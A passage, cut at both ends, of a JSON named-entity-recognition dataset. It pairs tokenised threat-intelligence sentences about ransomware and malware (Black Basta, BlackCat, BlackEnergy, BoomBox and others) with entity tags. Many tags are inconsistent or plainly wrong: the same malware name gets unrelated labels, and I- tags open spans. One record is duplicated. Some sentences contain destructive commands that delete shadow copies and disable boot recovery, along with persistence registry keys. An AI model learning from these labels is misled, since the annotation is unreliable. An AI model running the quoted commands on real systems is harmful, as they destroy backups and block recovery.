"O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "delete", "shadow", "copies", "using", "vssadmin.exe." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Black", "Basta", "has", "set", "the", "desktop", "wallpaper", "on", "victims'", "machines", "to", "display", "a", "ransom", "note." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Black", "Basta", "binary", "can", "use", "`chmod`", "to", "gain", "full", "permissions", "to", "targeted", "files." ], "ner_tags": [ "O", "I-SamFile", "B-SecTeam", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "has", "been", "downloaded", "and", "executed", "from", "malicious", "Excel", "files." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Black", "Basta", "has", "established", "persistence", "by", "creating", "a", "new", "service", "named", "`FAX`", "after", "deleting", "the", "legitimate", "service", "by", "the", "same", "name." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Black", "Basta", "dropper", "has", "mimicked", "an", "application", "for", "creating", "USB", "bootable", "drivers." ], "ner_tags": [ "O", "B-SamFile", "B-Tool", "B-SecTeam", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Black", "Basta", "can", "modify", "the", "Registry", "to", "enable", "itself", "to", "run", "in", "safe", "mode", "and", "to", "modify", "the", "icons", "and", "file", "extensions", "for", "encrypted", "files." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "has", "the", "ability", "to", "use", "native", "APIs", "for", "numerous", "functions", "including", "discovery", "and", "defense", "evasion." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Black", "Basta", "has", "used", "PowerShell", "scripts", "for", "discovery", "and", "to", "execute", "files", "over", "the", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "use", "LDAP", "queries", "to", "connect", "to", "AD", "and", "iterate", "over", "connected", "workstations." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "reboot", "victim", "machines", "in", "safe", "mode", "with", "networking", "via", "`bcdedit", "/set", "safeboot", "network`." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "check", "system", "flags", "and", "libraries,", "process", "timing,", "and", "API's", "to", "detect", "code", "emulation", "or", "sandboxing." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "I-Features", "I-Features", "I-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "enumerate", "volumes", "and", "collect", "system", "boot", "configuration", "and", "CPU", "information." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "B-Features", "I-Features", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "check", "whether", "the", "service", "name", "FAX", "is", "present." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "make", "a", "random", "number", "of", "calls", "to", "the", "`kernel32.beep`", "function", "to", "hinder", "log", "analysis." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "use", "`cmd.exe`", "to", "enable", "shadow", "copy", "deletion." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "has", "used", "WMI", "to", "execute", "files", "over", "the", "network." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Black", "Basta", "can", "create", "a", "new", "service", "to", "establish", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "has", "the", "ability", "modify", "access", "tokens." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "BlackCat", "can", "bypass", "UAC", "to", "escalate", "privileges." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "clear", "Windows", "event", "logs", "using", "`wevtutil.exe`." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "BlackCat", "has", "the", "ability", "to", "encrypt", "Windows", "devices,", "Linux", "devices,", "and", "VMWare", "instances." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "B-Tool", "B-Features", "O", "B-Way", "O" ] }, { "tokens": [ "BlackCat", "has", "the", "ability", "to", "wipe", "VM", "snapshots", "on", "compromised", "networks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "utilize", "`net", "use`", "commands", "to", "identify", "domain", "users." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "BlackCat", "can", "determine", "if", "a", "user", "on", "a", "compromised", "host", "has", "domain", "admin", "privileges." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "enumerate", "files", "for", "encryption." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "delete", "shadow", "copies", "using", "`vssadmin.exe", "delete", "shadows", "/all", "/quiet`", "and", "`wmic.exe", "Shadowcopy", "Delete`;", "it", "can", "also", "modify", "the", "boot", "loader", "using", "`bcdedit", "/set", "{default}", "recoveryenabled", "No`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "change", "the", "desktop", "wallpaper", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "replicate", "itself", "across", "connected", "servers", "via", "`psexec`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BlackCat", "has", "the", "ability", "to", "add", "the", "following", "registry", "key", "on", "compromised", "networks", "to", "maintain", "persistence:", "`HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services", "\\LanmanServer\\Paramenters`" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "BlackCat", "has", "the", "ability", "to", "discover", "network", "shares", "on", "compromised", "networks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "broadcasts", "NetBIOS", "Name", "Service", "(NBNC)", "messages", "to", "search", "for", "servers", "connected", "to", "compromised", "networks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "has", "the", "ability", "to", "stop", "VM", "services", "on", "compromised", "networks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "obtain", "the", "computer", "name", "and", "UUID,", "and", "enumerate", "local", "drives." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "BlackCat", "can", "utilize", "`net", "use`", "commands", "to", "discover", "the", "user", "name", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "execute", "commands", "on", "a", "compromised", "network", "with", "the", "use", "of", "`cmd.exe`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "BlackCat", "can", "use", "Windows", "commands", "such", "as", "`fsutil", "behavior", "set", "SymLinkEvaluation", "R2L:1`", "to", "redirect", "file", "system", "access", "to", "a", "different", "location", "after", "gaining", "access", "into", "compromised", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackCat", "can", "use", "`wmic.exe`", "to", "delete", "shadow", "copies", "on", "compromised", "networks." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "attempts", "to", "bypass", "default", "User", "Access", "Control", "(UAC)", "settings", "by", "exploiting", "a", "backward-compatibility", "setting", "found", "in", "Windows", "7", "and", "later." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "BlackEnergy", "component", "KillDisk", "is", "capable", "of", "deleting", "Windows", "Event", "Logs." ], "ner_tags": [ "O", "B-Way", "O", "B-Way", "O", "O", "O", "B-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "BlackEnergy", "has", "enabled", "the", "<code>TESTSIGNING</code>", "boot", "configuration", "option", "to", "facilitate", "loading", "of", "a", "driver", "component." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "has", "used", "a", "plug-in", "to", "gather", "credentials", "stored", "in", "files", "on", "the", "host", "by", "various", "software", "programs,", "including", "The", "Bat!", "email", "client,", "Outlook,", "and", "Windows", "Credential", "Store." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "has", "used", "a", "plug-in", "to", "gather", "credentials", "from", "web", "browsers", "including", "FireFox,", "Google", "Chrome,", "and", "Internet", "Explorer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "BlackEnergy", "2", "contains", "a", "\"Destroy\"", "plug-in", "that", "destroys", "data", "stored", "on", "victim", "hard", "drives", "by", "overwriting", "file", "contents." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "injects", "its", "DLL", "component", "into", "svchost.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BlackEnergy", "has", "the", "capability", "to", "communicate", "over", "a", "backup", "channel", "via", "plus.google.com." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "gathers", "a", "list", "of", "installed", "apps", "from", "the", "uninstall", "program", "Registry.", "It", "also", "gathers", "registered", "mail,", "browser,", "and", "instant", "messaging", "clients", "from", "the", "Registry.", "BlackEnergy", "has", "searched", "for", "given", "file", "types." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Way", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "has", "removed", "the", "watermark", "associated", "with", "enabling", "the", "<code>TESTSIGNING</code>", "boot", "configuration", "option", "by", "removing", "the", "relevant", "strings", "in", "the", "<code>user32.dll.mui</code>", "of", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "has", "run", "a", "keylogger", "plug-in", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "has", "conducted", "port", "scans", "on", "a", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "can", "gather", "very", "specific", "information", "about", "attached", "USB", "devices,", "to", "include", "device", "instance", "ID", "and", "drive", "geometry." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "has", "gathered", "a", "process", "list", "by", "using", "Tasklist.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "The", "BlackEnergy", "3", "variant", "drops", "its", "main", "DLL", "component", "and", "then", "creates", "a", ".lnk", "shortcut", "to", "that", "file", "in", "the", "startup", "folder." ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "has", "run", "a", "plug-in", "on", "a", "victim", "to", "spread", "through", "the", "local", "network", "by", "using", "PsExec", "and", "accessing", "admin", "shares." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "is", "capable", "of", "taking", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "One", "variant", "of", "BlackEnergy", "locates", "existing", "driver", "services", "that", "have", "been", "disabled", "and", "drops", "its", "driver", "component", "into", "one", "of", "those", "service's", "paths,", "replacing", "the", "legitimate", "executable.", "The", "malware", "then", "sets", "the", "hijacked", "service", "to", "start", "automatically", "to", "establish", "persistence." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "BlackEnergy", "3", "variant", "drops", "its", "main", "DLL", "component", "and", "then", "creates", "a", ".lnk", "shortcut", "to", "that", "file", "in", "the", "startup", "folder." ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "has", "used", "Systeminfo", "to", "gather", "the", "OS", "version,", "as", "well", "as", "information", "on", "the", "system", "configuration,", "BIOS,", "the", "motherboard,", "and", "the", "processor." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackEnergy", "has", "gathered", "information", "about", "network", "IP", "configurations", "using", "ipconfig.exe", "and", "about", "routing", "tables", "using", "route.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "BlackEnergy", "has", "gathered", "information", "about", "local", "network", "connections", "using", "netstat." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BlackEnergy", "communicates", "with", "its", "C2", "server", "over", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "A", "BlackEnergy", "2", "plug-in", "uses", "WMI", "to", "gather", "victim", "host", "details." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "One", "variant", "of", "BlackEnergy", "creates", "a", "new", "service", "using", "either", "a", "hard-coded", "or", "randomly", "generated", "name." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackMould", "can", "copy", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BlackMould", "has", "the", "ability", "to", "find", "files", "on", "the", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BlackMould", "has", "the", "ability", "to", "download", "files", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BlackMould", "can", "enumerate", "local", "drives", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackMould", "can", "send", "commands", "to", "C2", "in", "the", "body", "of", "HTTP", "POST", "requests." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BlackMould", "can", "run", "cmd.exe", "with", "parameters." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "BloodHound", "can", "compress", "data", "collected", "by", "its", "SharpHound", "ingestor", "into", "a", "ZIP", "file", "to", "be", "written", "to", "disk." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "can", "collect", "information", "about", "domain", "users,", "including", "identification", "of", "domain", "admin", "accounts." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "can", "collect", "information", "about", "domain", "groups", "and", "members." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "has", "the", "ability", "to", "map", "domain", "trusts", "and", "identify", "misconfigurations", "for", "potential", "abuse." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "has", "the", "ability", "to", "collect", "local", "admin", "information", "via", "GPO." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "B-Features", "O", "B-Way" ] }, { "tokens": [ "BloodHound", "can", "identify", "users", "with", "local", "administrator", "rights." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "can", "collect", "information", "about", "local", "groups", "and", "members." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "can", "use", ".NET", "API", "calls", "in", "the", "SharpHound", "ingestor", "component", "to", "pull", "Active", "Directory", "data." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "can", "collect", "password", "policy", "information", "on", "the", "target", "environment." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "can", "use", "PowerShell", "to", "pull", "Active", "Directory", "information", "from", "the", "target", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "can", "enumerate", "and", "collect", "the", "properties", "of", "domain", "computers,", "including", "domain", "controllers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BloodHound", "can", "collect", "information", "on", "user", "sessions." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Bonadan", "can", "create", "bind", "and", "reverse", "shells", "on", "the", "infected", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Bonadan", "has", "maliciously", "altered", "the", "OpenSSH", "binary", "on", "targeted", "systems", "to", "create", "a", "backdoor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bonadan", "can", "download", "additional", "modules", "from", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Bonadan", "can", "use", "the", "<code>ps</code>", "command", "to", "discover", "other", "cryptocurrency", "miners", "active", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bonadan", "can", "download", "an", "additional", "module", "which", "has", "a", "cryptocurrency", "mining", "extension." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bonadan", "can", "XOR-encrypt", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Bonadan", "has", "discovered", "the", "OS", "version,", "CPU", "model,", "and", "RAM", "size", "of", "the", "system", "it", "has", "been", "installed", "on." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bonadan", "can", "find", "the", "external", "IP", "address", "of", "the", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Bonadan", "has", "discovered", "the", "username", "of", "the", "user", "running", "the", "backdoor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "can", "decrypt", "AES-encrypted", "files", "downloaded", "from", "C2." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "has", "the", "ability", "to", "execute", "an", "LDAP", "query", "to", "enumerate", "the", "distinguished", "name,", "SAM", "account", "name,", "and", "display", "name", "for", "all", "domain", "users." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "can", "execute", "an", "LDAP", "query", "to", "discover", "e-mail", "accounts", "for", "domain", "users." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "I-Org", "O" ] }, { "tokens": [ "BoomBox", "can", "check", "its", "current", "working", "directory", "and", "for", "the", "presence", "of", "a", "specific", "file", "and", "terminate", "if", "specific", "values", "are", "not", "found." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "can", "upload", "data", "to", "dedicated", "per-victim", "folders", "in", "Dropbox." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BoomBox", "can", "search", "for", "specific", "files", "and", "directories", "on", "a", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "has", "the", "ability", "to", "download", "next", "stage", "malware", "components", "to", "a", "compromised", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "has", "gained", "execution", "through", "user", "interaction", "with", "a", "malicious", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "BoomBox", "has", "the", "ability", "to", "mask", "malicious", "data", "strings", "as", "PDF", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "B-HackOrg", "I-Features", "I-Features", "O", "I-Tool", "O" ] }, { "tokens": [ "BoomBox", "can", "encrypt", "data", "using", "AES", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "can", "establish", "persistence", "by", "writing", "the", "Registry", "value", "<code>MicroNativeCacheSvc</code>", "to", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "BoomBox", "can", "use", "RunDLL32", "for", "execution." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "BoomBox", "can", "enumerate", "the", "hostname,", "domain,", "and", "IP", "of", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "can", "enumerate", "the", "username", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "has", "used", "HTTP", "POST", "requests", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoomBox", "can", "download", "files", "from", "Dropbox", "using", "a", "hardcoded", "access", "token." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "has", "used", "DropBox", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "established", "persistence", "by", "setting", "the", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Windows\\load</code>", "registry", "key", "to", "point", "to", "its", "executable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "can", "upload", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "uploads", "files", "and", "data", "from", "a", "compromised", "host", "over", "the", "existing", "C2", "channel." ], "ner_tags": [ "B-Idus", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "has", "the", "capability", "to", "download", "folders'", "contents", "on", "the", "system", "and", "upload", "the", "results", "back", "to", "its", "Dropbox", "drive." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "has", "searched", "for", "files", "on", "the", "system,", "such", "as", "documents", "located", "in", "the", "desktop", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BoxCaon", "can", "download", "files." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O" ] }, { "tokens": [ "BoxCaon", "has", "created", "a", "working", "folder", "for", "collected", "files", "that", "it", "sends", "to", "the", "C2", "server." ], "ner_tags": [ "B-Idus", 